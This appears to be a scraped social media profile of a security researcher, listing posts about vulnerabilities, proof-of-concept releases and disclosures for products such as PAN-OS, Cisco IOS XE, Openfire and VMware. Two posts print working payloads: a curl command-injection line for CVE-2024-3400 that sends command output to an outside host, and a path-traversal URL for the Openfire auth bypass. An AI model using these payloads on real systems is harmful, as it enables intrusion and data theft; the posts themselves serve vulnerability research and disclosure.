_0xf4n9x_ @_0xf4n9x_
CyberSec Enthusiast, Security Researcher, RedTeam, Security Automation, ❣️OpenSource github.com/0xf4n9x Joined June 2019
Tweets: 248 | Followers: 5K | Following: 99 | Likes: 2K
🚀 CodeQL zero to hero part 3: Security research with CodeQL! Learn how to audit applications for vulnerabilities with CodeQL, tricks we can use for security research workflow, and how to find bugs in thousands of GitHub repos at once using MRVA. github.blog/2024-04-29-cod…
#CVE-2024-3400 PAN-OS: OS Command Injection Vulnerability in GlobalProtect Path Traversal -> File Write -> OS Command Injection POC: curl https://host/global-protect/login.esp -k -H 'Cookie: SESSID=./../../../opt/panlogs/tmp/device_telemetry/hour/a`curl${IFS}uip/?u=$(whoami)`'
The xz package, starting from version 5.6.0 to 5.6.1, was found to contain a backdoor. The impact of this vulnerability affected Kali between March 26th and March 29th. If you updated your Kali installation on or after March 26th, it is crucial to apply the latest updates today.
🔍 New POC Available! We’ve developed a Proof of Concept for CVE-2023-20198 in #Cisco IOS XE. This authentication-bypass allows an attacker to create new users with privilege level 15. Check out the details in horizon3.ai/cisco-ios-xe-c…
#CVE-2023-20198 #Cisco IOS XE Authentication Bypass #RCE Ref: horizon3.ai/cisco-ios-xe-c…
F5 BIGIP is vulnerable to a smuggling request vulnerability that an attacker can exploit to achieve unauthorized RCE. Our vulnerability research team responsibly disclosed this to F5, which released a hotfix today. hubs.ly/Q026ThPw0 #vulnerabilityresearch #f5 #cve
we're back - causing trouble with more enterprise-grade firewalls :-) join us on the journey... labs.watchtowr.com/yet-more-unaut…
Reproducing CVE-2023-38646: Metabase Pre-auth RCE blog.calif.io/p/reproducing-… CC @peterjson @testanull
#CVE-2023-32315 Openfire Admin Console Auth Bypass #POC: /setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp Ref: github.com/advisories/GHS… Credit to @Siebene7
🚨 Here is the #Exploit and technical detail for the CVE-2023-20887 Pre-Authenticated Remote Code Execution in #VMWare vRealize Network Insight. summoning.team/blog/vmware-vr…
Rapid7 has released a full exploit chain for #MOVEit Transfer CVE-2023-34362. The write-up we've published in AttackerKB contains more than 30 pages of analysis and code — huge shout-out to @iagox86, @stephenfewer, and @_CField for their work on this. attackerkb.com/topics/mXmV0Yp…
🚨 1/ Ongoing campaign primarily targeting security researchers here on Twitter. Possibly they are trying to exploit some vulnerability in Internet Explorer and database tools like Navicat. I haven't been able to get the malicious payload yet, but something fishy is going on 🤔
Popular proxy software Clash: CSRF unauthorized configuration reload leads to RCE 0xf4n9x.github.io/2022/10/20/cla…
@levilla_testi @pdnuclei It's been updated now with the PR github.com/projectdiscove… by @_0xf4n9x_ 🫡
CVE-2023-27524, a dangerous default configuration in #Apache #Superset, allows an unauth attacker to: 🔺 Gain RCE 🔺 Harvest Creds 🔺 Compromise Data We estimate there are roughly 2K+ servers on the Internet affected by this issue. horizon3.ai/cve-2023-27524…
CVE-2023-20864 - VMware Aria Operations for Logs / Log Insight Pre-Authentication RCE PoC. @pdnuclei Template - github.com/projectdiscove… cc @iamnoooob @wvuuuuuuuuuuuuu !
Multiple critical vulnerabilities in Strapi <=4.7.1 and all versions <=4.5.5 are vulnerable to unauthenticated RCE. For further details, check out my blog article: ghostccamm.com/blog/multi_str… @strapijs will be releasing their public disclosure soon!
